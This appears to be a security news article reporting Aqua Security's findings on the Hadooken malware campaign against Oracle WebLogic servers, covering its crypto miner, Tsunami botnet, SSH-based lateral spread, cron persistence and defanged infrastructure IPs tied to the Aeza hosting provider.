New Linux Malware Campaign Targets Oracle WebLogic Servers for Cryptocurrency Mining

Cybersecurity researchers have identified a new malware campaign targeting Linux systems to perform unauthorized cryptocurrency mining, specifically exploiting Oracle WebLogic servers. According to cloud security firm Aqua, the malware, named Hadooken, drops Tsunami malware and installs a crypto miner upon execution.

The attack leverages known vulnerabilities and misconfigurations, such as weak credentials, to gain initial access and execute code on vulnerable servers. The malware is deployed through two similar payloads—a Python script and a shell script—both of which download Hadooken from remote servers (“89.185.85[.]102” or “185.174.136[.]204”).

The shell script version also attempts to access directories containing SSH data, such as user credentials and host information, using this information to attack other servers. This allows the malware to spread laterally across the organization or connected environments, further distributing Hadooken.

The newly discovered Linux malware Hadooken includes two components: a cryptocurrency miner and a DDoS botnet known as Tsunami (or Kaiten), which is notorious for attacking Jenkins and WebLogic services in Kubernetes clusters.

To maintain persistence, the malware sets up cron jobs that run the crypto miner at varying intervals. Aqua Security noted that one of the IP addresses associated with the malware, 89.185.85[.]102, is registered in Germany with hosting company Aeza International LTD (AS210644). This IP was previously linked to the 8220 Gang’s cryptocurrency mining campaign, which exploited vulnerabilities in Apache Log4j and Atlassian Confluence.

Another associated IP, 185.174.136[.]204, is currently inactive but also linked to Aeza Group Ltd. (AS216246). Aeza, identified by Qurium and EU DisinfoLab in July 2024, is a bulletproof hosting provider based in Moscow and Frankfurt, known for sheltering cybercriminal activities. Researchers noted that Aeza’s rapid growth can be attributed to recruiting young developers connected to these bulletproof hosting services in Russia.

Share this post :